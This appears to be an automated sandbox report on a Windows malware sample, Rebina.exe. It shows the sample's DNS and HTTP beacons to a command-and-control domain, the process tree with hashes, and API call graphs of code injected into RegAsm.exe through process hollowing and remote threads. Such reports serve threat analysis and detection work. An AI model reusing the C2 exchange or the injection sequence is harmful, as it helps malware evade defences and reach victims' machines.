      Aug 28, 2024 11:17:01.799746037 CEST49705443192.168.2.5104.21.66.182
      Aug 28, 2024 11:17:01.799746037 CEST49705443192.168.2.5104.21.66.182
      Aug 28, 2024 11:17:01.799839973 CEST44349705104.21.66.182192.168.2.5
      Aug 28, 2024 11:17:02.186674118 CEST44349705104.21.66.182192.168.2.5
      Aug 28, 2024 11:17:02.186775923 CEST44349705104.21.66.182192.168.2.5
      Aug 28, 2024 11:17:02.186974049 CEST49705443192.168.2.5104.21.66.182
      Aug 28, 2024 11:17:02.190560102 CEST49705443192.168.2.5104.21.66.182
      Aug 28, 2024 11:17:02.190576077 CEST44349705104.21.66.182192.168.2.5
      TimestampSource PortDest PortSource IPDest IP
      Aug 28, 2024 11:17:00.617141008 CEST6523253192.168.2.51.1.1.1
      Aug 28, 2024 11:17:00.634032965 CEST53652321.1.1.1192.168.2.5
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Aug 28, 2024 11:17:00.617141008 CEST192.168.2.51.1.1.10x1327Standard query (0)assumptionflattyou.shopA (IP address)IN (0x0001)false
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Aug 28, 2024 11:17:00.634032965 CEST1.1.1.1192.168.2.50x1327No error (0)assumptionflattyou.shop104.21.66.182A (IP address)IN (0x0001)false
      Aug 28, 2024 11:17:00.634032965 CEST1.1.1.1192.168.2.50x1327No error (0)assumptionflattyou.shop172.67.163.54A (IP address)IN (0x0001)false
      • assumptionflattyou.shop
      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.549704104.21.66.1824435232C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      TimestampBytes transferredDirectionData
      2024-08-28 09:17:01 UTC270OUTPOST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 8
      Host: assumptionflattyou.shop
      2024-08-28 09:17:01 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
      Data Ascii: act=life
      2024-08-28 09:17:01 UTC561INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 09:17:01 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      X-Frame-Options: SAMEORIGIN
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hehdRYvOK4fAMohHZEVlMxHw5F4Co6BPBA5RD1XH0vBQg4HKv68nVr3xWJl5rZIhh7EPJXQIVRin%2BvDlLwTP55xQQ%2B72pKnEcsGCqo5Mr1jJve4D1ecU%2FKr4cstG3FFSWuOnpK4EhM1cHw%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8ba334b2bc221784-EWR
      2024-08-28 09:17:01 UTC808INData Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
      Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
      2024-08-28 09:17:01 UTC1369INData Raw: 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74
      Data Ascii: gi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElement
      2024-08-28 09:17:01 UTC1369INData Raw: 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 55 49 74 57 4c 50 62 2e 6a 66 66 46 6b 51 48 59 78 43 58 61 68 79 51 55 79 56 34 38 67 4d 6d 75 37 42 71 4a 77 44 31 4f 6a 42 6f 2d 31 37 32 34 38 33 36 36 32 31 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22
      Data Ascii: ain"> <input type="hidden" name="atok" value="UItWLPb.jffFkQHYxCXahyQUyV48gMmu7BqJwD1OjBo-1724836621-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="
      2024-08-28 09:17:01 UTC859INData Raw: 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f
      Data Ascii: eparator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Clo
      2024-08-28 09:17:01 UTC5INData Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      1192.168.2.549705104.21.66.1824435232C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      TimestampBytes transferredDirectionData
      2024-08-28 09:17:01 UTC360OUTPOST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      Cookie: __cf_mw_byp=UItWLPb.jffFkQHYxCXahyQUyV48gMmu7BqJwD1OjBo-1724836621-0.0.1.1-/api
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 49
      Host: assumptionflattyou.shop
      2024-08-28 09:17:01 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 40 4b 65 6e 30 7a 7a 26 6a 3d
      Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--@Ken0zz&j=
      2024-08-28 09:17:02 UTC816INHTTP/1.1 200 OK
      Date: Wed, 28 Aug 2024 09:17:02 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      Set-Cookie: PHPSESSID=to6a21b6nmdgpq9v25ftokb6ot; expires=Sun, 22-Dec-2024 03:03:41 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vZZ%2FxXeB%2BbkKyBSvHjvBLV%2BB%2F0fxfuuGHVKNenxYIp6gqkvwnsHrDMZwFIT9XsEbzw9BT5ewRnfCQlCdY78gqmP8CWkimtm5bQwCcD07pAfsNorbMALcKq5uv5gKnYfoMujN%2F6A5vpfvmw%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8ba334b68ecc8c47-EWR
      alt-svc: h3=":443"; ma=86400
      2024-08-28 09:17:02 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
      Data Ascii: aerror #D12
      2024-08-28 09:17:02 UTC5INData Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Click to jump to process

      Target ID:0
      Start time:05:16:59
      Start date:28/08/2024
      Path:C:\Users\user\Desktop\Rebina.exe
      Wow64 process (32bit):true
      Commandline:"C:\Users\user\Desktop\Rebina.exe"
      Imagebase:0x680000
      File size:292'352 bytes
      MD5 hash:30CBC399E37EEF662EAEB7D90148F013
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:true

      Target ID:1
      Start time:05:16:59
      Start date:28/08/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff6d64d0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:2
      Start time:05:16:59
      Start date:28/08/2024
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      Imagebase:0xf0000
      File size:65'440 bytes
      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:3
      Start time:05:16:59
      Start date:28/08/2024
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      Imagebase:0x110000
      File size:65'440 bytes
      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:4
      Start time:05:16:59
      Start date:28/08/2024
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      Wow64 process (32bit):true
      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      Imagebase:0x920000
      File size:65'440 bytes
      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:8
      Start time:05:17:02
      Start date:28/08/2024
      Path:C:\Windows\SysWOW64\WerFault.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5232 -s 1624
      Imagebase:0xde0000
      File size:483'680 bytes
      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Reset < >

        Execution Graph

        Execution Coverage:22.4%
        Dynamic/Decrypted Code Coverage:100%
        Signature Coverage:60%
        Total number of Nodes:30
        Total number of Limit Nodes:0
        execution_graph 581 2ac249d 582 2ac24d5 581->582 583 2ac25e3 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 582->583 588 2ac26a2 TerminateProcess 582->588 583->582 584 2ac26b2 WriteProcessMemory 583->584 585 2ac26f7 584->585 586 2ac26fc WriteProcessMemory 585->586 587 2ac2739 WriteProcessMemory Wow64SetThreadContext ResumeThread 585->587 586->585 588->583 589 e10987 590 e10aea 589->590 594 e10bf2 590->594 595 e104f8 590->595 592 e10b41 592->594 599 e1051c 592->599 596 e11078 VirtualProtectEx 595->596 598 e11103 596->598 598->592 600 e11430 CreateRemoteThread 599->600 602 e114db 600->602 602->594 609 e11077 610 e110c3 VirtualProtectEx 609->610 611 e11103 610->611 603 e10988 604 e10aea 603->604 605 e10bf2 604->605 606 e104f8 VirtualProtectEx 604->606 607 e10b41 606->607 607->605 608 e1051c CreateRemoteThread 607->608 608->605 612 e1142f 613 e1147e CreateRemoteThread 612->613 615 e114db 613->615

        Callgraph

        • Executed
        • Not Executed
        • Opacity -> Relevance
        • Disassembly available
        callgraph 0 Function_00E108E0 1 Function_00E100E4 2 Function_00E108E4 3 Function_00E108E7 4 Function_00E108E8 5 Function_02AC2BA7 6 Function_00E104EC 7 Function_00E100F0 8 Function_00E104F8 9 Function_02AC2BB7 10 Function_00E104C9 11 Function_00E100C8 12 Function_00E101C8 13 Function_02AC2B87 14 Function_00E104CD 15 Function_00E104D1 16 Function_02AC249D 17 Function_00E104D5 18 Function_00E100D4 19 Function_00E113D6 20 Function_00E108D8 21 Function_02AC2B97 22 Function_00E101DC 23 Function_00E113DC 71 Function_00E10178 23->71 24 Function_00E100A0 25 Function_00E104A4 26 Function_00E10EA7 27 Function_00E101A8 28 Function_02AC2BE7 29 Function_00E100B0 30 Function_00E104B0 31 Function_00E112B4 32 Function_00E10EB7 33 Function_00E101B8 34 Function_00E112BB 35 Function_02AC2BF7 36 Function_00E100BC 37 Function_00E104BC 38 Function_00E112BF 38->71 39 Function_00E10080 40 Function_00E10184 41 Function_00E10984 42 Function_00E10987 42->6 42->8 89 Function_00E10528 42->89 101 Function_00E10504 42->101 106 Function_00E10510 42->106 111 Function_00E1051C 42->111 43 Function_00E10988 43->6 43->8 43->89 43->101 43->106 43->111 44 Function_00E10588 45 Function_02AC2BC7 46 Function_02AC27C0 47 Function_00E10190 48 Function_00E10090 49 Function_00E10490 50 Function_00E10599 51 Function_02AC2BD7 52 Function_00E1019C 53 Function_02AC22D2 54 Function_00E10461 55 Function_00E10060 56 Function_00E10160 57 Function_00E10465 58 Function_00E11266 59 Function_00E10469 60 Function_00E10568 61 Function_02AC2C27 62 Function_00E1046D 63 Function_00E1016C 64 Function_00E1126C 64->71 65 Function_02AC2121 66 Function_00E10471 67 Function_00E10070 68 Function_00E10475 69 Function_00E11077 70 Function_00E10979 72 Function_00E10578 73 Function_02AC2C37 74 Function_00E1097C 75 Function_00E1097F 76 Function_00E10444 77 Function_00E10847 78 Function_00E10848 79 Function_00E10148 80 Function_00E10548 81 Function_02AC2C07 82 Function_00E1004D 83 Function_02AC2300 84 Function_00E10450 85 Function_00E10154 86 Function_00E10558 87 Function_02AC2C17 88 Function_00E1045D 90 Function_00E11428 91 Function_02AC2C67 92 Function_00E1112D 93 Function_00E1012C 94 Function_00E1142F 95 Function_02AC2B7E 96 Function_00E11135 97 Function_00E11137 97->71 98 Function_00E10538 99 Function_00E1013C 100 Function_00E10100 101->71 102 Function_00E11509 103 Function_02AC2C47 104 Function_00E1010C 105 Function_00E1150F 106->71 107 Function_00E10014 108 Function_00E10E18 109 Function_00E10C1B 110 Function_02AC2C57 112 Function_00E1011C 113 Function_00E10E1F

        Control-flow Graph

        APIs
        • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02AC260C
        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02AC261F
        • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02AC263D
        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02AC2661
        • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 02AC268C
        • TerminateProcess.KERNELBASE(?,00000000), ref: 02AC26AB
        • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 02AC26E4
        • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 02AC272F
        • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02AC276D
        • Wow64SetThreadContext.KERNEL32(?,?), ref: 02AC27A9
        • ResumeThread.KERNELBASE(?), ref: 02AC27B8
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2065490816.0000000002AC2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC2000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_2ac2000_Rebina.jbxd
        Similarity
        • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
        • String ID: GetP$Load$aryA$ress
        • API String ID: 2440066154-977067982
        • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
        • Instruction ID: e3bd4571ce013c221369d7127129acc7a048ac08e8bc5b45cd04a19349ee79d6
        • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
        • Instruction Fuzzy Hash: 80B1E57664028AAFDB60CF68CC80BDA77A5FF88714F158524EA0CAB341D774FA51CB94

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 22 e10988-e10ade 23 e10aea-e10b1f 22->23 24 e10ae5 call e104ec 22->24 27 e10b25-e10bd0 call e104f8 call e10504 call e10510 23->27 28 e10de7-e10dfd 23->28 24->23 48 e10bd2-e10bed call e1051c 27->48 49 e10bfe-e10c19 27->49 36 e10e02-e10e09 28->36 51 e10bf2-e10bfc call e10528 48->51 56 e10c31-e10c40 49->56 51->56 58 e10c42 56->58 59 e10c48 56->59 60 e10c44-e10c46 58->60 61 e10c4a-e10c65 58->61 62 e10c68-e10c73 59->62 60->59 60->61 61->62 64 e10c75 62->64 65 e10c7b-e10c81 62->65 66 e10c84-e10c95 64->66 67 e10c77-e10c79 64->67 65->66 68 e10c97 66->68 69 e10c9d-e10cc8 66->69 67->65 67->66 71 e10c99-e10c9b 68->71 72 e10cca-e10cdb 68->72 70 e10cde-e10ce4 69->70 73 e10ce6-e10cf5 70->73 74 e10cfb-e10d06 70->74 71->69 71->72 72->70 73->74 75 e10d08 74->75 76 e10d0e-e10d1c 74->76 75->76 77 e10d0a-e10d0c 75->77 78 e10d24-e10d45 76->78 79 e10d1e 76->79 77->76 81 e10d4b-e10d5c 78->81 80 e10d20-e10d22 79->80 79->81 80->78 80->81 82 e10d64-e10d79 81->82 83 e10d5e 81->83 86 e10d9c-e10dab 82->86 84 e10d60-e10d62 83->84 85 e10d7b-e10d96 83->85 84->82 84->85 85->86 88 e10db3-e10dbb 86->88 89 e10dad 86->89 90 e10dc1-e10dd3 88->90 89->90 91 e10daf-e10db1 89->91 92 e10dd5 90->92 93 e10ddb-e10de5 90->93 91->88 91->90 92->36 94 e10dd7-e10dd9 92->94 93->36 94->36 94->93
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2065223373.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_e10000_Rebina.jbxd
        Similarity
        • API ID: CreateProtectRemoteThreadVirtual
        • String ID: \ {h$ak3
        • API String ID: 2395912828-2677785941
        • Opcode ID: ce028637d3f35729ee7fe0ab2f98300491006651bd6ed504de721f5e41a73a7d
        • Instruction ID: e724406dd8754bb32567c768717a9738e3148a7d7a338fb9ca298fd422b2e3c2
        • Opcode Fuzzy Hash: ce028637d3f35729ee7fe0ab2f98300491006651bd6ed504de721f5e41a73a7d
        • Instruction Fuzzy Hash: E9D14DB4E002188FDB24DFA9C980B9DBBB2FB88314F1495A8E509EB255CB709DC5CF51

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 95 e10987-e10af0 call e104ec 98 e10afc-e10b1f 95->98 100 e10b25-e10b3c call e104f8 98->100 101 e10de7-e10dfd 98->101 104 e10b41-e10b87 100->104 109 e10e02-e10e09 101->109 112 e10b92-e10b94 104->112 113 e10b9b-e10baf call e10504 112->113 117 e10bb4-e10bbd call e10510 113->117 120 e10bc2-e10bd0 117->120 121 e10bd2-e10bed call e1051c 120->121 122 e10bfe-e10c19 120->122 124 e10bf2-e10bfc call e10528 121->124 129 e10c31-e10c40 122->129 124->129 131 e10c42 129->131 132 e10c48 129->132 133 e10c44-e10c46 131->133 134 e10c4a-e10c65 131->134 135 e10c68-e10c73 132->135 133->132 133->134 134->135 137 e10c75 135->137 138 e10c7b-e10c81 135->138 139 e10c84-e10c95 137->139 140 e10c77-e10c79 137->140 138->139 141 e10c97 139->141 142 e10c9d-e10cc8 139->142 140->138 140->139 144 e10c99-e10c9b 141->144 145 e10cca-e10cdb 141->145 143 e10cde-e10ce4 142->143 146 e10ce6-e10cf5 143->146 147 e10cfb-e10d06 143->147 144->142 144->145 145->143 146->147 148 e10d08 147->148 149 e10d0e-e10d1c 147->149 148->149 150 e10d0a-e10d0c 148->150 151 e10d24-e10d45 149->151 152 e10d1e 149->152 150->149 154 e10d4b-e10d5c 151->154 153 e10d20-e10d22 152->153 152->154 153->151 153->154 155 e10d64-e10d79 154->155 156 e10d5e 154->156 159 e10d9c-e10dab 155->159 157 e10d60-e10d62 156->157 158 e10d7b-e10d96 156->158 157->155 157->158 158->159 161 e10db3-e10dbb 159->161 162 e10dad 159->162 163 e10dc1-e10dd3 161->163 162->163 164 e10daf-e10db1 162->164 165 e10dd5 163->165 166 e10ddb-e10de5 163->166 164->161 164->163 165->109 167 e10dd7-e10dd9 165->167 166->109 167->109 167->166
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2065223373.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_e10000_Rebina.jbxd
        Similarity
        • API ID: CreateProtectRemoteThreadVirtual
        • String ID: \ {h$ak3
        • API String ID: 2395912828-2677785941
        • Opcode ID: 6507324a687eb4deb8156266c880b8a1dc65efde35e3fdd8f307d9bd8468b7b3
        • Instruction ID: 17433e4679a8a5ad9191d8085befdd548fd2b69d6f0b970cbedd5cf8fb4724f1
        • Opcode Fuzzy Hash: 6507324a687eb4deb8156266c880b8a1dc65efde35e3fdd8f307d9bd8468b7b3
        • Instruction Fuzzy Hash: 8DB15AB4E002188FDB24DFA9D980BDDBBB2FB88314F1495A8E109AB255CBB05DC5CF51

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 168 e1051c-e1148a 171 e1149a-e114d9 CreateRemoteThread 168->171 172 e1148c-e11498 168->172 173 e114e2-e114f6 171->173 174 e114db-e114e1 171->174 172->171 174->173
        APIs
        • CreateRemoteThread.KERNELBASE(?,00000000,?,?,00000000,?,?,?,?,?,00000000,00000000,03AC234C,?,00E10BF2,?), ref: 00E114CC
        Memory Dump Source
        • Source File: 00000000.00000002.2065223373.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_e10000_Rebina.jbxd
        Similarity
        • API ID: CreateRemoteThread
        • String ID:
        • API String ID: 4286614544-0
        • Opcode ID: ffc32598b7fb883b04745cbdd9d1d4e69d9cc475c6091b03a8a13f64b50e1cae
        • Instruction ID: fa87521d2f14b8b143a884c6addfd788dd0a9e40eb9d20bd831498e243e054a8
        • Opcode Fuzzy Hash: ffc32598b7fb883b04745cbdd9d1d4e69d9cc475c6091b03a8a13f64b50e1cae
        • Instruction Fuzzy Hash: 183110B1D00249DFCB10CF9AD884ADEBBF4FB48310F20842AE919A7310D375A954CFA5

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 176 e1142f-e1148a 178 e1149a-e114d9 CreateRemoteThread 176->178 179 e1148c-e11498 176->179 180 e114e2-e114f6 178->180 181 e114db-e114e1 178->181 179->178 181->180
        APIs
        • CreateRemoteThread.KERNELBASE(?,00000000,?,?,00000000,?,?,?,?,?,00000000,00000000,03AC234C,?,00E10BF2,?), ref: 00E114CC
        Memory Dump Source
        • Source File: 00000000.00000002.2065223373.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_e10000_Rebina.jbxd
        Similarity
        • API ID: CreateRemoteThread
        • String ID:
        • API String ID: 4286614544-0
        • Opcode ID: 7a056e48013c6e8f7390d9a34005be4de38306c497a881bbc4354f16df425e98
        • Instruction ID: 3d40a7bdc9ca5ba72b4f657272c7ab27d9ddde57f21c1831e7884afb4f73e86a
        • Opcode Fuzzy Hash: 7a056e48013c6e8f7390d9a34005be4de38306c497a881bbc4354f16df425e98
        • Instruction Fuzzy Hash: EE21FEB5D012499FCB10CFAAD984ADEBFF4FB48310F20842AE919A7350C375A954CFA1

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 183 e104f8-e11101 VirtualProtectEx 186 e11103 183->186 187 e11108-e11121 183->187 186->187
        APIs
        • VirtualProtectEx.KERNELBASE(?,03AC3590,?,?,?,?,?,?,?,?,?,?,00E10B41,?,00000040,?), ref: 00E110F4
        Memory Dump Source
        • Source File: 00000000.00000002.2065223373.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_e10000_Rebina.jbxd
        Similarity
        • API ID: ProtectVirtual
        • String ID:
        • API String ID: 544645111-0
        • Opcode ID: 8304e7ed3a635e7001c9e6aee941f0301c4c238448135aa1ca332bc285a17ad5
        • Instruction ID: 6d1353a6cc7a0425757a7f57ce8d147eb223a672d19f5051b349edfcce323110
        • Opcode Fuzzy Hash: 8304e7ed3a635e7001c9e6aee941f0301c4c238448135aa1ca332bc285a17ad5
        • Instruction Fuzzy Hash: 1E21E3B1D05259EFCB10DF9AD884ADEFFB4FB48310F50816AEA18A7200C375A954CFA1

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 189 e11077-e110bb 190 e110c3-e11101 VirtualProtectEx 189->190 191 e11103 190->191 192 e11108-e11121 190->192 191->192
        APIs
        • VirtualProtectEx.KERNELBASE(?,03AC3590,?,?,?,?,?,?,?,?,?,?,00E10B41,?,00000040,?), ref: 00E110F4
        Memory Dump Source
        • Source File: 00000000.00000002.2065223373.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_e10000_Rebina.jbxd
        Similarity
        • API ID: ProtectVirtual
        • String ID:
        • API String ID: 544645111-0
        • Opcode ID: 9624ef8c797849d53fdd7a1a85c8e779f032b3095da513731e98a57947069b9b
